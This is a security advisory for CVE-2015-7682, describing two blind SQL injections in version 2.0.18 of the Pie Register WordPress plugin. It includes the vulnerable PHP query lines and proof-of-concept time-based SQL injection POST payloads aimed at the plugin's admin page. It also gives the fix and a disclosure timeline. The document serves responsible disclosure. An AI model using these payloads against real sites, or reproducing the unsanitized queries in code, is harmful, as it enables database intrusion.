CVE-2015-7682: Multiple Blind SQL Injections in Pie Register WordPress Plugin

2015-10-26T00:00:00
ID SECURITYVULNS:DOC:32605
Type securityvulns
Reporter Securityvulns
Modified 2015-10-26T00:00:00

Description

Details

Software: Pie Register Version: 2.0.18 Homepage: https://github.com/GTSolutions/Pie-Register CVE: CVE-2015-7682 (Pending) CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N) CWE: CWE-89

Description

Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs.

Vulnerabilities

The vulnerabilities are due to the unsanitized POST parameters invitaion_code_bulk_option and invi_del_id:

Injection 1: From pie-register/pie-register.php: 576: $this->delete_invitation_codes($_POST['select_invitaion_code_bulk_option']); . . . 3521: $sql = "DELETE FROM `$codetable` WHERE `id` IN ( ".$ids." )";

Injection 2: From pie-register/pie-register.php: 1941: if($wpdb->query("DELETE FROM ".$codetable." WHERE id = ".$_POST['invi_del_id']))

Proof of concept

URL: http://localhost/wordpress/wp-admin/admin.php?page=pie-invitation-codes

Injection 1: POST data: select_invitaion_code_bulk_option=1)%20OR%20SLEEP(15)%3d0%20LIMIT%201--&invitaion_code_bulk_option=delete&btn_submit_invitaion_code_bulk_option=Apply

Injection 2: POST data: piereg_invitation_nonce=66e7e6383d&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dpie-invitation-codes&invi_del_id=1%20OR%20SLEEP(15)%3d0%20LIMIT%201--

Remediation

Upgrade the plugin to version 2.0.19 or higher.

Timeline

2015-09-23: Discovered 2015-09-24: Contacted vendor via website support form 2015-09-28: Vendor supplied security contact email 2015-09-28: Requested CVE 2015-09-30: Report sent to vendor and wordpress.org 2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed 2015-10-12: Public Disclosure

References

[1] http://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injection_Attacks

Discovered by

David Moore @grajagandev